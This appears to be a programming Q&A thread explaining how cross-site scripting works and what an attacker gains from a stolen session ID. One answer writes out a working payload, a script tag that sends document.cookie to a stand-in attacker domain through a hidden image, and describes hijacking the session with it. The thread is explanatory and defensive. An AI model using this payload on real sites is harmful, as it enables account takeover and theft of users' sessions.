How XSS attack really works?

Question

Hey,

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.
But if developer forgot to use it, what can attacker/hacker do? He can get your session_id, right? And here is a question. What can he do with that?
Thank you very much.

Answer 1

Start reading about XSS here: http://en.wikipedia.org/wiki/XSS and http://en.wikipedia.org/wiki/Cross-site_scripting

Answer 2

Attacker A gets member B to access site C with B's credentials via A's carefully constructed URI.

A can then run any JS they like on C using B's credentials.

This allows them to:

• Present any information they like to B as if it came from C
• Get B's browser to send any information they want from C to A
  • Account details
  • Private information
• Send any instruction to site C as if it came from A
  • Publish this spam
  • Transfer money to this account
  • Buy this very expensive eBook

Answer 3

If you have an XSS vulnerability on your web site, then a hacker can insert any HTML into the page, including a <script> tag. If I'm logged in to your web site and visit the attacked page, my browser will run the JavaScript inserted there by the hacker and make my browser do whatever the hacker intended.

Such as sending a POST request to your server to change my password, then loading an URL from the hacker's server to notify him of my account number so he can log on and steal my account.

Answer 4

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.

Right. Use it anywhere when you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

But if developer forgot to use it, what can attacker/hacker do?

S/he can insert some malicious HTML/script. E.g. the following in some message/comment at a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

The above will request an image from the mailicious domain along with the document cookie as query string.

He can get your session_id, right? And here is a question. What can he do with that?

The session ID is stored in a cookie. Once the hacker is notified about that an image has been requested with the cookie in query string, all s/he has to do is just to edit the browser's cookie to include the same session ID to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.

Answer 5

This is the best explenation of XSS I have ever ran into: Flash Animation Example

Here's the Second Video